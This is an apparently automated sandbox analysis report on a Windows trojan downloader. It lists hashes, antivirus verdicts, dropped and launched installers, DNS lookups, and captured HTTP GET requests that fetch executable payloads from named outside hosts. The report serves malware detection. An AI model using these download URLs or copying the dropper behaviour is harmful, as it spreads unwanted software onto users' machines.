Analysis Date2015-08-22 03:15:43
MD59a11a6b09ef5382d6c0b3da15a5d1bc2
SHA160ed4e01cd8f7a6e91ea99b8741ac40c0f7e7552

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9cb827c88315cd4225f5b8e9205a1cac sha1: 54d67fd8eba2ab9b84cce2d5e057adebf478e85b size: 350208
Section.rdata md5: 34f61441e9b948ac30a12599bed5fc58 sha1: 9d1591b81a7467d599a8a9d09a51224596fa6b2e size: 82432
Section.data md5: a02e7e870b848a8c34673cb856a41534 sha1: bdecc977794de401db36bdaa2f05c6963db993ad size: 6656
Section.rsrc md5: e5f43a9c8970e68cd977a6750e5efa86 sha1: 5cb1670e1ec7972ad514489013e6c1c5503efa88 size: 67072
Section.reloc md5: 164f08785df275b5c41f26ca27a089a1 sha1: 7b1ff2b7a66234dd01319c997880fca040422898 size: 14848
Timestamp2015-07-28 07:11:00
Pdb pathC:\Users\Administrator\Desktop\setup_simple_2015-7-27\setup_simple_变统计位置\Release\File_5_77oddd.pdb
PackerMicrosoft Visual C++ ?.?
PEhash7beca87042333b385a5fd3990108a63efd6ec5ba
IMPhash5cdd62a0ea9c7b3a71d3773ce9c7c9a4
AVK7Trojan-Downloader ( 004c98251 )
AVDr. WebTrojan.DownLoader15.15098
AVTrend Microno_virus
AVBullGuardno_virus
AVClamAVno_virus
AVEset (nod32)Win32/TrojanDownloader.Agent.BPH
AVGrisoft (avg)Downloader.Generic14.ACYN
AVArcabit (arcavir)no_virus
AVKasperskyno_virus
AVPadvishno_virus
AVFortinetW32/Agent.BPH!tr.dldr
AVRisingno_virus
AVSymantecDownloader
AVBitDefenderno_virus
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVCA (E-Trust Ino)no_virus
AVMalwareBytesno_virus
AVAuthentiumW32/S-33c71ac4!Eldorado
AVCAT (quickheal)no_virus
AVMicroWorld (escan)no_virus
AVEmsisoftno_virus
AVF-Secureno_virus
AVVirusBlokAda (vba32)Backdoor.Zegost
AVAvira (antivir)TR/Dldr.Agent.524467
AVAd-Awareno_virus
AVIkarusTrojan-Downloader.Win32.Agent
AVFrisk (f-prot)no_virus
AVTwisterno_virus
AVZillya!Downloader.Agent.Win32.271516
AVMcafeeGenericR-ECB!9A11A6B09EF5
AVMicrosoft Security EssentialsSoftwareBundler:Win32/Tupseg

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\IQIYIsetup_l_spl004@kb010.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\install_124_1.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\setup_a1474.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\pp2.0_ad_dubo_Installer.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\setup_30004.exe
Creates FilePHYSICALDRIVE0
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\duba_10_2.exe
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Setup_Y_21.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\160wifi_wcid-6074.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\59wan_1139.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\hdzy_sr_108_thx.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\IQIYIsetup_l_spl004@kb010.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\hdzy_sr_108_thx.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\setup_30004.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\160wifi_wcid-6074.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\59wan_1139.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Setup_Y_21.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\duba_10_2.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\pp2.0_ad_dubo_Installer.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\setup_a1474.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\install_124_1.exe
Creates MutexSetupfgdf
Winsock DNS1.hnsununion.com
Winsock DNSdl.yunuq.com
Winsock DNSdl.static.iqiyi.com
Winsock DNSghost.25pp.com
Winsock DNSdown.shijiakai.net
Winsock DNSdown.dreamerv.com
Winsock DNSres.maoha.com
Winsock DNScd001.www.duba.net
Winsock DNSd.juezhao123.com
Winsock DNSdown.sui17.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\setup_a1474.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs2.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\SETUP_~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs2.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\install_124_1.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\INSTAL~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scs4.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs3.tmp
Deletes FileC:\WINDOWS\TEMP\scs4.tmp
Deletes FileC:\WINDOWS\TEMP\scs3.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\hdzy_sr_108_thx.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\HDZY_S~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs5.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs6.tmp
Deletes FileC:\WINDOWS\TEMP\scs5.tmp
Deletes FileC:\WINDOWS\TEMP\scs6.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\setup_30004.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs8.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs7.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\SETUP_~2.EXE
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes FileC:\WINDOWS\TEMP\scs8.tmp
Deletes FileC:\WINDOWS\TEMP\scs7.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\IQIYIsetup_l_spl004@kb010.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scsA.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\IQIYIS~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs9.tmp
Deletes FileC:\WINDOWS\TEMP\scsA.tmp
Deletes FileC:\WINDOWS\TEMP\scs9.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\59wan_1139.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scsC.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scsB.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\59WAN_~1.EXE
Deletes FileC:\WINDOWS\TEMP\scsC.tmp
Deletes FileC:\WINDOWS\TEMP\scsB.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\duba_10_2.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Setup_Y_21.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\SETUP_~3.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scsD.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\TEMP\scsE.tmp
Deletes FileC:\WINDOWS\TEMP\scsD.tmp
Deletes FileC:\WINDOWS\TEMP\scsE.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\160wifi_wcid-6074.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\160WIF~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scsF.tmp
Creates FileC:\WINDOWS\TEMP\scs10.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes FileC:\WINDOWS\TEMP\scsF.tmp
Deletes FileC:\WINDOWS\TEMP\scs10.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\pp2.0_ad_dubo_Installer.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\TEMP\scs12.tmp
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs11.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\PP20_A~1.EXE
Deletes FileC:\WINDOWS\TEMP\scs12.tmp
Deletes FileC:\WINDOWS\TEMP\scs11.tmp

Network Details:

DNSdown.shijiakai.net
Type: A
58.220.21.68
DNSdown.sui17.com
Type: A
58.218.199.228
DNSdl.yunuq.com
Type: A
120.26.74.125
DNSd.juezhao123.com
Type: A
58.222.24.189
DNSdownload.pps.tv.webscache.com
Type: A
119.188.40.81
DNSdown.dreamerv.com
Type: A
122.224.10.16
DNScc00036.h.cncssr.chinacache.net
Type: A
183.95.152.96
DNScc00036.h.cncssr.chinacache.net
Type: A
222.142.57.4
DNScc00036.h.cncssr.chinacache.net
Type: A
222.142.57.38
DNScc00036.h.cncssr.chinacache.net
Type: A
124.67.23.140
DNSp23.tcdn.qq.com
Type: A
182.118.124.195
DNSp23.tcdn.qq.com
Type: A
182.118.124.209
DNSp23.tcdn.qq.com
Type: A
182.118.124.210
DNSp23.tcdn.qq.com
Type: A
27.221.21.210
DNSp23.tcdn.qq.com
Type: A
42.48.109.19
DNSp23.tcdn.qq.com
Type: A
42.56.64.27
DNSp23.tcdn.qq.com
Type: A
42.56.65.19
DNSp23.tcdn.qq.com
Type: A
42.56.65.20
DNSp23.tcdn.qq.com
Type: A
101.71.72.151
DNSp23.tcdn.qq.com
Type: A
113.6.237.65
DNSp23.tcdn.qq.com
Type: A
113.6.237.66
DNSp23.tcdn.qq.com
Type: A
119.188.71.93
DNSp23.tcdn.qq.com
Type: A
119.188.94.63
DNSp23.tcdn.qq.com
Type: A
123.129.203.146
DNSp23.tcdn.qq.com
Type: A
123.155.153.146
DNS1st.dl.ourdvs.com
Type: A
171.107.186.80
DNS1st.dtwscachev1.ourwebcdn.com
Type: A
115.231.159.73
DNSdl.static.iqiyi.com
Type: A
DNScd001.www.duba.net
Type: A
DNS1.hnsununion.com
Type: A
DNSres.maoha.com
Type: A
DNSghost.25pp.com
Type: A
HTTP GEThttp://down.shijiakai.net:81/setup_a1474.exe
User-Agent:
HTTP GEThttp://down.sui17.com/UserFiles/install_124_1.exe
User-Agent:
HTTP GEThttp://dl.yunuq.com/hdzy_sr_108_thx.exe
User-Agent:
HTTP GEThttp://d.juezhao123.com/setup/setup_30004.exe
User-Agent:
HTTP GEThttp://dl.static.iqiyi.com/hz/IQIYIsetup_l_spl004@kb010.exe
User-Agent:
HTTP GEThttp://down.dreamerv.com/pack/59wan_1139.exe
User-Agent:
HTTP GEThttp://cd001.www.duba.net/duba/install/2011/ever/duba_10_2.exe
User-Agent:
HTTP GEThttp://1.hnsununion.com/Setup_Y_21.exe
User-Agent:
HTTP GEThttp://res.maoha.com/soft/160wifi/160wifi_wcid-6074.exe
User-Agent:
HTTP GEThttp://ghost.25pp.com/soft/pppc_setup/pp2.0_ad_dubo_Installer.exe
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 58.220.21.68:81
Flows TCP192.168.1.1:1032 ➝ 58.218.199.228:80
Flows TCP192.168.1.1:1033 ➝ 120.26.74.125:80
Flows TCP192.168.1.1:1034 ➝ 58.222.24.189:80
Flows TCP192.168.1.1:1035 ➝ 119.188.40.81:80
Flows TCP192.168.1.1:1036 ➝ 122.224.10.16:80
Flows TCP192.168.1.1:1037 ➝ 183.95.152.96:80
Flows TCP192.168.1.1:1038 ➝ 182.118.124.195:80
Flows TCP192.168.1.1:1039 ➝ 171.107.186.80:80
Flows TCP192.168.1.1:1040 ➝ 115.231.159.73:80

Raw Pcap
0x00000000 (00000)   47455420 2f736574 75705f61 31343734   GET /setup_a1474
0x00000010 (00016)   2e657865 20485454 502f312e 310d0a48   .exe HTTP/1.1..H
0x00000020 (00032)   6f73743a 20646f77 6e2e7368 696a6961   ost: down.shijia
0x00000030 (00048)   6b61692e 6e65743a 38310d0a 41636365   kai.net:81..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a0d0a              pt: */*....

0x00000000 (00000)   47455420 2f557365 7246696c 65732f69   GET /UserFiles/i
0x00000010 (00016)   6e737461 6c6c5f31 32345f31 2e657865   nstall_124_1.exe
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   20646f77 6e2e7375 6931372e 636f6d0d    down.sui17.com.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a0d0a   .Accept: */*....
0x00000050 (00080)                                         

0x00000000 (00000)   47455420 2f68647a 795f7372 5f313038   GET /hdzy_sr_108
0x00000010 (00016)   5f746878 2e657865 20485454 502f312e   _thx.exe HTTP/1.
0x00000020 (00032)   310d0a48 6f73743a 20646c2e 79756e75   1..Host: dl.yunu
0x00000030 (00048)   712e636f 6d0d0a41 63636570 743a202a   q.com..Accept: *
0x00000040 (00064)   2f2a0d0a 0d0a743a 202a2f2a 0d0a0d0a   /*....t: */*....
0x00000050 (00080)                                         

0x00000000 (00000)   47455420 2f736574 75702f73 65747570   GET /setup/setup
0x00000010 (00016)   5f333030 30342e65 78652048 5454502f   _30004.exe HTTP/
0x00000020 (00032)   312e310d 0a486f73 743a2064 2e6a7565   1.1..Host: d.jue
0x00000030 (00048)   7a68616f 3132332e 636f6d0d 0a416363   zhao123.com..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a0d0a 0d0a0d0a   ept: */*........
0x00000050 (00080)                                         

0x00000000 (00000)   47455420 2f687a2f 49514959 49736574   GET /hz/IQIYIset
0x00000010 (00016)   75705f6c 5f73706c 30303440 6b623031   up_l_spl004@kb01
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   486f7374 3a20646c 2e737461 7469632e   Host: dl.static.
0x00000040 (00064)   69716979 692e636f 6d0d0a41 63636570   iqiyi.com..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 0d0a                t: */*....

0x00000000 (00000)   47455420 2f706163 6b2f3539 77616e5f   GET /pack/59wan_
0x00000010 (00016)   31313339 2e657865 20485454 502f312e   1139.exe HTTP/1.
0x00000020 (00032)   310d0a48 6f73743a 20646f77 6e2e6472   1..Host: down.dr
0x00000030 (00048)   65616d65 72762e63 6f6d0d0a 41636365   eamerv.com..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a0d0a41 63636570   pt: */*....Accep
0x00000050 (00080)   743a202a 2f2a0d0a 0d0a                t: */*....

0x00000000 (00000)   47455420 2f647562 612f696e 7374616c   GET /duba/instal
0x00000010 (00016)   6c2f3230 31312f65 7665722f 64756261   l/2011/ever/duba
0x00000020 (00032)   5f31305f 322e6578 65202048 5454502f   _10_2.exe  HTTP/
0x00000030 (00048)   312e310d 0a486f73 743a2063 64303031   1.1..Host: cd001
0x00000040 (00064)   2e777777 2e647562 612e6e65 740d0a41   .www.duba.net..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 0d0a       ccept: */*....

0x00000000 (00000)   47455420 2f536574 75705f59 5f32312e   GET /Setup_Y_21.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000020 (00032)   73743a20 312e686e 73756e75 6e696f6e   st: 1.hnsununion
0x00000030 (00048)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x00000040 (00064)   2a0d0a0d 0a647562 612e6e65 740d0a41   *....duba.net..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 0d0a       ccept: */*....

0x00000000 (00000)   47455420 2f736f66 742f3136 30776966   GET /soft/160wif
0x00000010 (00016)   692f3136 30776966 695f7763 69642d36   i/160wifi_wcid-6
0x00000020 (00032)   3037342e 65786520 48545450 2f312e31   074.exe HTTP/1.1
0x00000030 (00048)   0d0a486f 73743a20 7265732e 6d616f68   ..Host: res.maoh
0x00000040 (00064)   612e636f 6d0d0a41 63636570 743a202a   a.com..Accept: *
0x00000050 (00080)   2f2a0d0a 0d0a202a 2f2a0d0a 0d0a       /*.... */*....

0x00000000 (00000)   47455420 2f736f66 742f7070 70635f73   GET /soft/pppc_s
0x00000010 (00016)   65747570 2f707032 2e305f61 645f6475   etup/pp2.0_ad_du
0x00000020 (00032)   626f5f49 6e737461 6c6c6572 2e657865   bo_Installer.exe
0x00000030 (00048)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000040 (00064)   2067686f 73742e32 3570702e 636f6d0d    ghost.25pp.com.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a0d0a   .Accept: */*....
0x00000060 (00096)                                         


Strings